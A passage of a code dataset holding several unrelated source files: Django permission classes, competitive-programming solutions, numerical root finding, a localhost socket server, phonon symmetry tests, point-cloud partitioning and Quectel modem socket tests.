request.user.is_authenticated:\n try:\n actual_project = Projects.objects.get(pk=view.kwargs['projects_pk'])\n except :\n return False\n author = actual_project.author_user_id\n contributors = Contributors.objects.filter(project_id=actual_project.id)\n if request.user == author:\n return True\n elif request.user in contributors:\n return True\n\n def has_object_permission(self, request, view, obj):\n if request.user.is_authenticated:\n actual_project = Projects.objects.get(pk=view.kwargs['projects_pk'])\n author = actual_project.author_user_id\n contributors = Contributors.objects.filter(project_id=actual_project.id)\n if request.user == author:\n if request.method in self.author_object_methods:\n return True\n elif request.user in contributors:\n if request.method in self.contributor_methods:\n return True\n\n\nclass IsIssueAuthorOrAssignee(BasePermission):\n \"\"\"\n Allow access to the issues view if user is Authenticated and,\n author or contributors of the related project\n Issue Author can create, get, modify or delete contributors\n Contributors can only get and post Issues\n \"\"\"\n message = 'you should be authenticated and this issue author or assignee!'\n author_object_methods = ['GET', 'POST', 'PUT', 'DELETE']\n base_methods = ['GET', 'POST']\n\n def has_permission(self, request, view):\n if request.user.is_authenticated:\n self.actual_project = Projects.objects.get(pk=view.kwargs['projects_pk'])\n self.project_author = self.actual_project.author_user_id\n self.project_contributors = Contributors.objects.filter(project_id=self.actual_project.id)\n if request.user == self.project_author:\n return True\n elif request.user in self.project_contributors:\n return True\n else:\n print('you are not associated with this project')\n\n def has_object_permission(self, request, view, obj):\n if request.user.is_authenticated:\n actual_issue = Issues.objects.get(pk=view.kwargs['pk'])\n issue_author = actual_issue.author_user_id\n assignee = Users.objects.get(id=actual_issue.assignee_user_id.id)\n if request.user == issue_author:\n if request.method in self.author_object_methods:\n return True\n elif request.user in assignee:\n if request.method in self.base_methods:\n return True\n else:\n print('you are not associated with this issue')\n\n\nclass IsCommentAuthor(BasePermission):\n \"\"\"\n Allow access to the issues view if user is Authenticated and,\n author or Assignee of the related issue\n Comment Author can create, get, modify or delete Comment\n Related issue members can only get and post Comment\n \"\"\"\n message = 'you should be authenticated and Author or contributor!'\n author_object_methods = ['GET', 'POST', 'PUT', 'DELETE']\n base_methods = ['GET', 'POST']\n\n def has_permission(self, request, view):\n if request.user.is_authenticated:\n self.actual_issue = Issues.objects.get(pk=view.kwargs['issues_pk'])\n self.issue_author = self.actual_issue.author_user_id\n self.assignee = Users.objects.get(id=self.actual_issue.assignee_user_id.id)\n if request.user == self.issue_author:\n return True\n elif request.user in self.assignee:\n return True\n else:\n print('you are not associated with this issue')\n\n def has_object_permission(self, request, view, obj):\n if request.user.is_authenticated:\n actual_comment = Comments.objects.get(pk=view.kwargs['pk'])\n comment_author = actual_comment.author_user_id\n if request.user == comment_author:\n if request.method in self.author_object_methods:\n print('issue member, comment author')\n return True\n else:\n if request.method in self.base_methods:\n print('issue member alone')\n return True\n","repo_name":"Satupathe/OC-P10-AG","sub_path":"SoftProjects/projects/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":6131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1660279156","text":"\"\"\"\nTitle : 가르침\nLink : https://www.acmicpc.net/problem/1062\n\"\"\"\n\nfrom itertools import combinations\nimport sys\ninput = sys.stdin.readline\n\n\ndef solution():\n N, K = map(int, input().split())\n alphabets = {'a', 'c', 'i', 'n', 't'}\n\n words = []\n additional_alphabests = set()\n for _ in range(N):\n word = input().strip()[4:-4]\n word = set(s for s in word) - alphabets\n words.append(word)\n additional_alphabests |= word\n\n limit = K - 5\n if limit < 0:\n print(0)\n return\n if len(list(additional_alphabests)) <= limit:\n ans = N\n else:\n ans = 0\n for comb in list(combinations(additional_alphabests, limit)):\n count = 0\n comb = set(comb)\n for word in words:\n for s in word:\n if s not in comb:\n break\n else:\n count += 1\n if ans < count:\n ans = count\n print(ans)\n return\n\n\nsolution()\n","repo_name":"mintropy/algorithm_pulzo","sub_path":"이영준/2022/02/0228/1062.py","file_name":"1062.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"25278965957","text":"import numpy as np\n\nclass Iteration1D:\n def __init__(self,f,method):\n # Define self attributes\n self.f = f\n self.method = method\n\n # Initialize initial interval for bisection\n self.a = None\n self.b = None\n\n # Initialize initial guess\n self.p0 = None\n\n # Initialize tolerance and max iterations\n self.tol = None\n self.Nmax = None\n\n # Initialize info message\n self.info = None\n\n # Initialize root\n self.pstar = None\n\n # Initialize iters for Newton or fixedpt\n self.p_iters = None\n\n # Initialize save_all variables\n self.save_all = False\n\n # Initialize vector of all guesses\n self.p = None\n\n # Initialize error type to absolute by default\n self.error = 'absolute'\n\n # Define root-finding functions\n def root(self):\n # Reset self.info\n self.info = None\n\n if self.method == 'bisection':\n if self.a is None:\n self.info = \"ERROR: Initial interval not fully defined. Please define a valid value for the beginning of the interval, a\"\n self.pstar = None\n elif self.b is None:\n self.info = \"ERROR: Initial interval not fully defined. Please define a valid value for the end of the interval, b\"\n self.pstar = None\n elif self.tol is None:\n self.info = \"ERROR: tolerance not defined. Please define a valid value for tol\"\n self.pstar = None\n elif self.Nmax is None:\n self.info = \"ERROR: Max iterations not specified. Please define Nmax\"\n self.pstar = None\n else:\n # Run bisection method\n [self.pstar, self.ier] = bisection(self.f, self.a, self.b, self.tol, self.Nmax, self.error)\n\n # Classify error message\n if self.ier == 1:\n self.info = \"ERROR: No root in initial interval\"\n self.pstar = None\n elif self.ier == 2:\n self.info = \"ERROR: Exceeded max iterations. Root not found to specified tolerance\"\n self.pstar = None\n elif self.ier == 3:\n self.info = \"ERROR: Root not found\"\n self.pstar = None\n elif self.ier == 4:\n self.info = \"ERROR: Invalid error type\"\n self.pstar = None\n elif self.method == 'fixedpt':\n if self.p0 is None:\n self.info = \"ERROR: No initial guess. Please define x0\"\n self.pstar = None\n elif self.tol is None:\n self.info = \"ERROR: tolerance not defined. Please define a valid value for tol\"\n self.pstar = None\n elif self.Nmax is None:\n self.info = \"ERROR: Max iterations not specified. Please define Nmax\"\n self.pstar = None\n else:\n # Run fixed point method\n if self.save_all:\n [self.pstar,self.ier,self.p] = fixedpt(self.f,self.p0,self.tol,self.Nmax,self.save_all,self.error)\n else:\n [self.pstar,self.ier] = fixedpt(self.f,self.p0,self.tol,self.Nmax,self.save_all,self.error)\n\n # Classify error message\n if self.ier == 1:\n self.info = \"ERROR: Exceeded max iterations. Root not found to specified tolerance\"\n self.pstar = None\n if self.ier == 2:\n self.info = \"ERROR: Invalid error type\"\n self.pstar = None\n else:\n self.info = \"ERROR: Incorrect method type. Please select either 'bisection' or 'fixedpt.'\"\n self.pstar = None\n \n # Print error statement if it exists\n if self.info is not None:\n print(self.info)\n \n # Return the root\n return self.pstar\n\ndef bisection(f,a,b,tol,Nmax,error):\n '''\n Inputs:\n f,a,b - function and endpoints of initial interval\n tol, Nmax - bisection stops when interval length < tol\n - or if Nmax iterations have occured\n error - error type\n Returns:\n astar - approximation of root\n ier - error message\n - ier = 1 => cannot tell if there is a root in the interval\n - ier = 0 == success\n - ier = 2 => ran out of iterations\n - ier = 3 => other error ==== You can explain\n '''\n\n ''' first verify there is a root we can find in the interval '''\n ier = 0\n fa = f(a); fb = f(b)\n if (fa*fb>0):\n ier = 1\n astar = a\n return [astar, ier]\n\n ''' verify end point is not a root '''\n if (fa == 0):\n astar = a\n ier =0\n return [astar, ier]\n\n if (fb ==0):\n astar = b\n ier = 0\n return [astar, ier]\n\n count = 0\n while (count < Nmax):\n c = 0.5*(a+b)\n fc = f(c)\n\n if (fc == 0):\n astar = c\n ier = 0\n print(\"The algorithm converged in \" + str(count) + \" iterations!\")\n return [astar, ier]\n\n if (fa*fc<0):\n b = c\n elif (fb*fc<0):\n a = c\n fa = fc\n else:\n astar = c\n ier = 3\n return [astar, ier]\n\n if error == 'absolute':\n if (abs(b-a) int:\n def nextPermutation(nums: List[int]):\n n = len(nums)\n\n # From back to front, find the first num < nums[i + 1]\n i = n - 2\n while i >= 0:\n if nums[i] < nums[i + 1]:\n break\n i -= 1\n\n # From back to front, find the first num > nums[i], swap it with nums[i]\n if i >= 0:\n for j in range(n - 1, i, -1):\n if nums[j] > nums[i]:\n nums[i], nums[j] = nums[j], nums[i]\n break\n\n def reverse(nums, l, r):\n while l < r:\n nums[l], nums[r] = nums[r], nums[l]\n l += 1\n r -= 1\n\n # Reverse nums[i + 1..n - 1]\n reverse(nums, i + 1, len(nums) - 1)\n\n A = [int(c) for c in num] # Original\n B = A.copy() # Permutated\n\n for _ in range(k):\n nextPermutation(B)\n\n def countSteps(A: List[int], B: List[int]) -> int:\n count = 0\n\n j = 0\n for i in range(len(A)):\n j = i\n while A[i] != B[j]:\n j += 1\n while i < j:\n B[j], B[j - 1] = B[j - 1], B[j]\n j -= 1\n count += 1\n\n return count\n\n return countSteps(A, B)\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/1850. Minimum Adjacent Swaps to Reach the Kth Smallest Number/1850.py","file_name":"1850.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"37671161200","text":"# Echo server\n\n# Importing Libraries\nimport socket\nimport sys\nimport struct\nimport array\n\nclass environment():\n\t\n\t# Connection for sender socket\n\tglobal sendConn\n\tsendHost = 'localhost' # Symbolic name meaning all available interfaces\n\tsendPort = 50000 # Arbitrary non-privileged port\n\t# Connection for receiver socket\n\tglobal recvConn\n\trecvHost = 'localhost' # Symbolic name meaning all available interfaces\n\trecvPort = 50001 # Arbitrary non-privileged port\n\tglobal last_data\n\t\n\t# Creating server Socket\n\tdef createServerSockets(self):\n\t\t\n\t\t# Calling socket creater methods\n\t\tself.createSendServerSocket()\n\t\tself.createRecvServerSocket()\n\n\tdef createSendServerSocket(self):\n\t\t# Creating server Socket location\n\t\tserverSocketS = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\ttry:\n\t\t\tserverSocketS.bind((self.sendHost, self.sendPort))\n\t\texcept:\n\t\t\tprint('Bind failed.')\n\t\t\tsys.exit()\n\t\tprint ('Socket bind complete')\n\t\t# Enable listening\n\t\tserverSocketS.listen(1)\n\t\tprint ('Socket now listening')\n\t\t\n\t\t# Wait for client connection\n\t\tprint ('waiting 10 seconds for response from client at sender port ',self.sendPort)\n\t\tserverSocketS.settimeout(10)\n\t\ttry:\n\t\t\tself.sendConn, addr = serverSocketS.accept()\n\t\texcept socket.timeout:\n\t\t\tprint('No connection, program terminated')\n\t\t\tsys.exit()\n\t\tprint ('Connected by', addr,'on sender port',self.sendPort)\n\t\t\n\t\t\n\t\t# Create socket for receiving\n\t\t\n\t\t# Creating server Socket\n\tdef createRecvServerSocket(self):\n\t\t# Creating server Socket location\n\t\tserverSocketR = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\ttry:\n\t\t\tserverSocketR.bind((self.recvHost, self.recvPort))\n\t\texcept:\n\t\t\tprint('Bind failed.')\n\t\t\tsys.exit()\n\t\tprint ('Socket bind complete')\n\t\t# Enable listening\n\t\tserverSocketR.listen(1)\n\t\tprint ('Socket now listening')\n\t\t\n\t\t# Wait for client connection\n\t\tprint ('waiting for response from client at receiver port ',self.recvPort)\n\t\tself.recvConn, addr = serverSocketR.accept()\n\t\tprint ('Connected by', addr,'on receiver port',self.recvPort)\n\t\n\tdef receiveState(self):\n\t\t# Receive state formed as binary array\n\t\tdata = self.recvConn.recv(2048);\n\t\t# decode state\n\t\treturn self.decodeState(data)\n\n\tdef decodeState(self, data):\n\t\t# Unpack from hex (binary array) to double\n\t\ttry:\n\t\t\tdata = array.array('d',data)\n\t\texcept: \n\t\t\tdata = self.last_data\n\n\t\treturn data\n\t\t\n\tdef sendAction(self, msg):\n\t\tmsg = struct.pack(\"I\",msg)\n\t\tself.sendConn.sendall(msg)#.encode('utf-8'))\t","repo_name":"maczikasz/eligibility_pump","sub_path":"world/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37007172455","text":"from gui.app import SampleApp\nfrom entities.database import DataBase\nimport sqlite3\nfrom database import CreateDataBase\n\n\n\nif __name__ == \"__main__\":\n decision = input(\"Do you want to create the database? Y/N\")\n main_db = DataBase(\n name=\"main_database.db\",\n tables={\n \"stakeholders\": ['Name', 'Needs', 'Parent'],\n \"needs\": ['name', 'Description', 'Stakeholder', 'Requirements'],\n \"requirements\": ['Name', 'Description', 'Priority', 'Type', 'Source', 'Version', 'Author']}\n )\n if decision == \"Y\":\n CreateDataBase(main_db)\n\n app = SampleApp(main_db)\n\n app.mainloop()\n","repo_name":"0110lekniw/chare_v2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74493561654","text":"from obsidian.module import Module, AbstractModule, Dependency\nfrom obsidian.cpe import CPE\n\n\n@Module(\n \"InstantMOTD\",\n description=\"Indicates a client supports receiving Server Identification packets at any time, not just before a map is sent.\",\n author=\"Obsidian\",\n version=\"1.0.0\",\n dependencies=[Dependency(\"core\")]\n)\n@CPE(\n extName=\"InstantMOTD\",\n extVersion=1,\n cpeOnly=True\n)\nclass InstantMOTDModule(AbstractModule):\n def __init__(self, *args):\n super().__init__(*args)\n","repo_name":"EdwardJXLi/ProjectObsidian","sub_path":"obsidian/modules/cpe/instantmotd.py","file_name":"instantmotd.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"21"} +{"seq_id":"19024199560","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport numpy as np\n\nimport cellconstructor as CC\nimport cellconstructor.Phonons\nimport cellconstructor.symmetries\n\nimport sys, os\nimport pytest\n\n@pytest.mark.parametrize(\"FILDYN, NQIRR\", [(\"Sym.dyn.\", 3), (\"skydyn_\", 4)])\ndef test_symmetries_supercell(FILDYN, NQIRR):\n\n total_path = os.path.dirname(os.path.abspath(__file__))\n os.chdir(total_path)\n\n\n dynmat = CC.Phonons.Phonons(FILDYN, NQIRR)\n SUPERCELL = dynmat.GetSupercell()\n\n # Compute the frequencies\n supercell_dyn = dynmat.GenerateSupercellDyn(SUPERCELL)\n w1, pols = supercell_dyn.DyagDinQ(0)\n\n # Show the modes for each q point\n for i,q in enumerate(dynmat.q_tot):\n print (\"Dyagonalizing:\", q)\n w, p = dynmat.DyagDinQ(i)\n print (\" \".join([\"%.4f cm-1 \" % (x * CC.Phonons.RY_TO_CM) for x in w]))\n\n #dynmat.Symmetrize()\n # # Test the symmetrization\n qe_sym = CC.symmetries.QE_Symmetry(dynmat.structure)\n\n fc_dynmat_start = np.array(dynmat.dynmats)\n\n\n after_sym = fc_dynmat_start.copy()\n qe_sym.SymmetrizeFCQ(after_sym, dynmat.q_stars, verbose = True)\n for i,q in enumerate(dynmat.q_tot):\n dynmat.dynmats[i] = after_sym[i,:,:]\n\n # Show the modes for each q point\n for i,q in enumerate(dynmat.q_tot):\n print (\"After Dyagonalizing:\", q)\n w, p = dynmat.DyagDinQ(i)\n print (\" \".join([\"%.4f cm-1 \" % (x * CC.Phonons.RY_TO_CM) for x in w]))\n\n # Print the difference between before and after the symmetrization\n print ()\n print (\"Difference of the symmetrization:\")\n print (np.sqrt( np.sum( (after_sym - fc_dynmat_start)**2 ) / np.sum(after_sym*fc_dynmat_start)))\n\n # print \"\"\n\n # Now lets try to randomize the matrix\n #new_random = np.random.uniform( size = np.shape(fc_dynmat_start)) + 1j*np.random.uniform( size = np.shape(fc_dynmat_start))\n\n # print \"Saving a not symmetrized random matrix to Random.dyn.IQ, where IQ is the q index\"\n # # Lets save the new matrix in QE format\n # for i, q in enumerate(dynmat.q_tot):\n # dynmat.dynmats[i] = new_random[i, :, :]\n # dynmat.save_qe(\"Random.dyn.\")\n\n # # Lets constrain the symmetries\n # # We use asr = crystal to force the existence of the acustic modes in Gamma\n # qe_sym.SymmetrizeFCQ(new_random, np.array(dynmat.q_stars), asr = \"no\")\n\n # # Lets save the new matrix in QE format\n # for i, q in enumerate(dynmat.q_tot):\n # dynmat.dynmats[i] = new_random[i, :, :]\n\n # print \"Saving a symmetrized random matrix to Sym.dyn.IQ, where IQ is the q index\"\n # dynmat.save_qe(\"Sym.dyn.\")\n # print \"\"\n\n # Compute the frequencies\n supercell_dyn = dynmat.GenerateSupercellDyn(SUPERCELL)\n w, pols = supercell_dyn.DyagDinQ(0)\n # Get the translations\n t = CC.Methods.get_translations(pols, supercell_dyn.structure.get_masses_array())\n\n dynmat.Symmetrize()\n # Compute the frequencies\n supercell_dyn = dynmat.GenerateSupercellDyn(SUPERCELL)\n w3, pols = supercell_dyn.DyagDinQ(0)\n # Get the translations\n t = CC.Methods.get_translations(pols, supercell_dyn.structure.get_masses_array())\n\n\n # Make the assert test\n for i, _w_ in enumerate(w):\n w2 = w3[i]\n\n assert np.abs(_w_ - w2) < 1e-8\n\n # print \"Frequencies:\"\n # print \"\\n\".join([\"%.4f cm-1 | %.4f cm-1 | %.4f cm-1 T: %d\" % (w1[i]*CC.Phonons.RY_TO_CM, w[i]*CC.Phonons.RY_TO_CM, w3[i]*CC.Phonons.RY_TO_CM, t[i]) for i in range(len(w))])\n # print \"\"\n # print \"Done.\"\n\n\nif __name__ == \"__main__\":\n test_symmetries_supercell(\"Sym.dyn.\", 3)\n","repo_name":"SSCHAcode/CellConstructor","sub_path":"tests/TestSymmetriesSupercell/test_symmetries_supercell.py","file_name":"test_symmetries_supercell.py","file_ext":"py","file_size_in_byte":3574,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"} +{"seq_id":"13537258702","text":"import os\nimport glob\nimport numpy as np\nfrom pyntcloud import PyntCloud\nfrom collections import defaultdict\nfrom tqdm import tqdm\nfrom itertools import cycle\nfrom torch.multiprocessing import Pool\n\ndef partition(filename, args):\n # partition.\n point_cloud = PyntCloud.from_file(filename)\n pc_xyz = point_cloud.points.values[:, :3]\n\n # partition point cloud to cubes.\n cubes = defaultdict(list)\n for point in pc_xyz:\n cube_index = tuple((point//args.cube_size).astype(\"int\"))\n local_point = point % args.cube_size # np.array\n cubes[cube_index].append(local_point)\n list_item = list(cubes.keys())\n for item in list_item:\n if len(cubes[item]) < args.min_num:\n del cubes[item]\n return cubes\n\ndef write_cubes(cubes, args, name):\n items = os.path.basename(name).replace('.ply', '').split('_')\n if 'enc' in name:\n category = items[-2]\n frame = items[-3].zfill(8)\n squence = items[1]\n else:\n category = 'gt'\n squence = items[0]\n frame = items[-1].zfill(8)\n result_dir = '{}/{}/{}'.format(category, squence, frame)\n result_dir = os.path.join(args.save_dir, result_dir)\n if not os.path.exists(result_dir):\n os.makedirs(result_dir)\n for item in cubes:\n name = [str(item).zfill(3) for item in item]\n name = os.path.join(result_dir, '_'.join(name)+'.txt')\n array = np.vstack(cubes[item]).astype(np.int32)\n np.savetxt(name, array, '%d')\n\ndef run(data):\n filename, args = data\n cubes = partition(filename, args)\n write_cubes(cubes, args, filename)\n\nif __name__=='__main__':\n import argparse\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"--source_dir\", type=str, default=\"./example\")\n parser.add_argument(\"--save_dir\", type=str, default=\"./data\")\n parser.add_argument(\"--cube_size\", type=int, default=64)\n parser.add_argument(\"--min_num\", type=int, default=3)\n parser.add_argument('--workers', type=int, default=20)\n args = parser.parse_args()\n\n point_cloud_dirs = sorted(glob.glob(os.path.join(args.source_dir, '*.ply')))\n\n pool = Pool(args.workers)\n args_list = cycle([args])\n for data in tqdm(pool.imap_unordered(run, zip(point_cloud_dirs, args_list))):\n None \n","repo_name":"fxqzb/Deep-Geometry-Post-Processing","sub_path":"util/split_point_cloud.py","file_name":"split_point_cloud.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"352960679","text":"from unittest.mock import patch, call\nimport pytest\nimport sys\n\nfrom Hologram.Network.Modem.Quectel import Quectel\nfrom Hologram.Network.Modem.Modem import Modem\nfrom UtilClasses import ModemResult\n\nsys.path.append(\".\")\nsys.path.append(\"..\")\nsys.path.append(\"../..\")\n\n\ndef mock_write(modem, message):\n return True\n\n\ndef mock_read(modem):\n return True\n\n\ndef mock_readline(modem, timeout=None, hide=False):\n return \"\"\n\n\ndef mock_open_serial_port(modem, device_name=None):\n return True\n\n\ndef mock_close_serial_port(modem):\n return True\n\n\ndef mock_detect_usable_serial_port(modem, stop_on_first=True):\n return \"/dev/ttyUSB0\"\n\n\n@pytest.fixture\ndef no_serial_port(monkeypatch):\n monkeypatch.setattr(Quectel, \"_read_from_serial_port\", mock_read)\n monkeypatch.setattr(Quectel, \"_readline_from_serial_port\", mock_readline)\n monkeypatch.setattr(Quectel, \"_write_to_serial_port_and_flush\", mock_write)\n monkeypatch.setattr(Quectel, \"openSerialPort\", mock_open_serial_port)\n monkeypatch.setattr(Quectel, \"closeSerialPort\", mock_close_serial_port)\n monkeypatch.setattr(Quectel, \"detect_usable_serial_port\", mock_detect_usable_serial_port)\n\n\ndef test_init_Quectel_no_args(no_serial_port):\n modem = Quectel()\n assert modem.timeout == 1\n assert modem.socket_identifier == 0\n assert modem.chatscript_file.endswith(\"/chatscripts/default-script\")\n assert modem._at_sockets_available\n\n@patch.object(Quectel, \"check_registered\")\n@patch.object(Quectel, \"set\")\n@patch.object(Quectel, \"command\")\ndef test_create_socket(mock_command, mock_set, mock_check, no_serial_port):\n modem = Quectel()\n modem.apn = 'test'\n mock_check.return_value = True\n # The PDP context is not active\n mock_command.return_value = (ModemResult.OK, '+QIACT: 0,0')\n mock_set.return_value = (ModemResult.OK, None)\n modem.create_socket()\n mock_command.assert_called_with(\"+QIACT?\")\n mock_set.assert_has_calls(\n [\n call(\"+QICSGP\", '1,1,\\\"test\\\",\\\"\\\",\\\"\\\",1'),\n call(\"+QIACT\", '1', timeout=30)\n ],\n any_order=True\n )\n\n@patch.object(Quectel, \"command\")\ndef test_connect_socket(mock_command, no_serial_port):\n modem = Quectel()\n modem.socket_identifier = 1\n host = \"hologram.io\"\n port = 9999\n modem.connect_socket(host, port)\n mock_command.assert_called_with(\"+QIOPEN\", '1,0,\"TCP\",\"%s\",%d,0,1' % (host, port))\n\n\n@patch.object(Quectel, \"set\")\ndef test_write_socket_small(mock_command, no_serial_port):\n modem = Quectel()\n modem.socket_identifier = 1\n data = b\"Message smaller than 510 bytes\"\n mock_command.return_value = (ModemResult.OK, None)\n modem.write_socket(data)\n mock_command.assert_called_with(\n \"+QISENDEX\",\n '1,\"4d65737361676520736d616c6c6572207468616e20353130206279746573\"',\n timeout=10,\n )\n\n\n@patch.object(Quectel, \"set\")\ndef test_write_socket_large(mock_command, no_serial_port):\n modem = Quectel()\n modem.socket_identifier = 1\n data = b\"a\" * 300\n mock_command.return_value = (ModemResult.OK, None)\n modem.write_socket(data)\n mock_command.assert_has_calls(\n [\n call(\"+QISENDEX\", '1,\"%s\"' % (\"61\" * 255), timeout=10),\n call(\"+QISENDEX\", '1,\"%s\"' % (\"61\" * 45), timeout=10),\n ],\n any_order=True,\n )\n\n@patch.object(Quectel, \"set\")\ndef test_read_socket(mock_command, no_serial_port):\n modem = Quectel()\n modem.socket_identifier = 1\n mock_command.return_value = (ModemResult.OK, '+QIRD: \"Some val\"')\n # Double quotes should be stripped from the reutrn value\n assert (modem.read_socket(payload_length=10) == 'Some val')\n mock_command.assert_called_with(\"+QIRD\", '1,10')\n\ndef test_handle_open_urc(no_serial_port):\n modem = Quectel()\n modem.handleURC('+QIOPEN: 1,0')\n assert modem.urc_state == Modem.SOCKET_WRITE_STATE\n assert modem.socket_identifier == 1\n\ndef test_handle_received_data_urc(no_serial_port):\n modem = Quectel()\n modem.handleURC('+QIURC: \\\"recv\\\",1,25')\n assert modem.urc_state == Modem.SOCKET_SEND_READ\n assert modem.socket_identifier == 1\n assert modem.last_read_payload_length == 25\n assert modem.urc_response == \"\"\n\ndef test_handle_socket_closed_urc(no_serial_port):\n modem = Quectel()\n modem.handleURC('+QIURC: \\\"closed\\\",1')\n assert modem.urc_state == Modem.SOCKET_CLOSED\n assert modem.socket_identifier == 1\n\n","repo_name":"hologram-io/hologram-python","sub_path":"tests/Modem/test_Quectel.py","file_name":"test_Quectel.py","file_ext":"py","file_size_in_byte":4386,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"21"} +{"seq_id":"23093647619","text":"import pandas as pd\nimport random\n\n\ndef EdgeSwap():\n df = pd.read_csv(\"../../Gephi/Gephi_Edge_List.csv\")\n #df = pd.read_csv(\"./test_data.csv\")\n\n print('Startind Edge swap')\n\n all_ids = list(range(0, len(df)))\n\n new_data = []\n\n MAX_ATTEMPTS = 10\n\n while len(all_ids) > 1:\n if(MAX_ATTEMPTS <= 0):\n break\n\n rand_i1 = random.randint(0,len(all_ids)-1)\n v1 = all_ids[rand_i1]\n all_ids.pop(rand_i1)\n\n rand_i2 = random.randint(0,len(all_ids)-1)\n v2 = all_ids[rand_i2]\n all_ids.pop(rand_i2)\n\n if(df.iloc[v1]['Source'] == df.iloc[v2]['Target']):\n MAX_ATTEMPTS -= 1\n continue\n\n e1 = [df.iloc[v1]['Source'], df.iloc[v2]['Target'], df.iloc[v1]['Weight']]\n e2 = [df.iloc[v2]['Source'], df.iloc[v1]['Target'], df.iloc[v2]['Weight']]\n\n new_data.append(e1)\n new_data.append(e2)\n \n\n print(all_ids)\n #Add any left over edges that cannot be shuffled\n for id in all_ids:\n print(\"LEFT OVER ID =\" + str(id))\n v = all_ids[id]\n new_data.append([df.iloc[v]['Source'], df.iloc[v]['Target'], df.iloc[v]['Weight']])\n \n return new_data","repo_name":"Nunuvin/cryptic_philanthropist","sub_path":"Analysis/Null Model/EdgeSwap.py","file_name":"EdgeSwap.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9893263654","text":"import pytest as _pytest\n\nfrom downforeveryone import useragents\n\n\n@_pytest.mark.parametrize(\"execution_number\", range(20))\ndef test_string_returned(execution_number):\n result = useragents.random_agent()\n assert isinstance(result, str)\n\n\ndef test_random_called_once(mocker):\n random_choice = mocker.patch(\"random.choice\", autospec=True)\n useragents.random_agent()\n\n random_choice.assert_called_once_with(useragents.USER_AGENTS)\n","repo_name":"rpdelaney/downforeveryone","sub_path":"tests/test_useragents/test_useragents.py","file_name":"test_useragents.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"22215927607","text":"from github_search.data_utils import DB, RedisList\nimport fakeredis\n\n\ndef simple_test(d):\n d['a'] = 1\n assert d['a'] == 1\n d['a'] = True\n assert d['a']\n d['a'] = {'a' : True}\n assert d['a']['a']\n d['a'] = [1, 2, 3]\n assert d['a'] == [1, 2, 3]\n\nr = fakeredis.FakeStrictRedis()\n#d = DB(write_to='redis', redis_handle=r)\n#simple_test(d)\nsimple_test(DB(write_to='file'))\n","repo_name":"joeystevens00/Github-Explore-Plus","sub_path":"tests/test_redis_utils.py","file_name":"test_redis_utils.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33835624704","text":"# n이 소수인지 판정\ndef isprime(n):\n if n <= 1: return False\n i = 2\n while i*i <= n:\n if n%i == 0: return False\n i += 1\n return True\n\n# n을 k진법으로 나타낸 문자열 반환\ndef conv(n, k):\n s = ''\n while n:\n s += str(n%k)\n n //= k\n return s[::-1]\n\ndef solution(n, k):\n s = conv(n,k)\n cnt = 0\n for num in s.split('0'):\n if not num: continue # 빈 문자열에 대한 예외처리 split 토큰이 연속으로나오면 해당 부분은 공백으로 들어가는구나\n if isprime(int(num)): cnt += 1\n return cnt\n\n\n\n# import math\n\n# def conv(n,k):\n# ret = []\n# tmp = 0\n# while n!=0:\n# tmp = n%k\n# ret.append(tmp)\n# n = n//k\n# ret = list(map(str,ret))\n# return \"\".join(reversed(ret))\n\n# def isPrime(n):\n# if n<2:\n# return False\n# elif n==2:\n# return True\n# for i in range(3, math.ceil(math.sqrt(n))+1):\n# if n%i==0:\n# return False\n# return True\n\n# def solution(n, k):\n# answer = 0\n# ret = conv(n,k)\n# tmp = \"\"\n# arr = []\n# for i in ret:\n# if i!='0':\n# tmp+=i\n# else:\n# if tmp!=\"\":\n# arr.append(int(tmp))\n# tmp = \"\"\n# if tmp:\n# arr.append(int(tmp))\n\n# for a in arr:\n# if isPrime(a):\n# answer+=1\n\n# return answer\n\nsolution(437674,3)\nsolution(1100011,10)\n# print(\"\")\n\n# 소수인지는 어떻게 판별할것?\n# 최대범위가 20자리비트인데 20자리의 1이 소수인지 시간안에 판별할 수 있나?\n# 그렇다고 저 수를 에라토스로 만들수도없고\n# 0111...111일때 이게 소수인지 어떻게 판단할거야 19개자리나되는데?\n# 제곱근까지만 계산하면 위아래로 식이 반전된 형태라 소수인지 판별가능\n\n","repo_name":"mrsuit0114/algorithmprac","sub_path":"programmers/202304/다시볼것/k진수에서소수개수구하기.py","file_name":"k진수에서소수개수구하기.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21039243595","text":"from peewee import BooleanField, CharField, CompositeKey, DateTimeField, IntegerField, Model, \\\n MySQLDatabase, fn\n\nfrom tools.configs.db import DB_HOST, DB_NAME, DB_PASSWORD, DB_PORT, 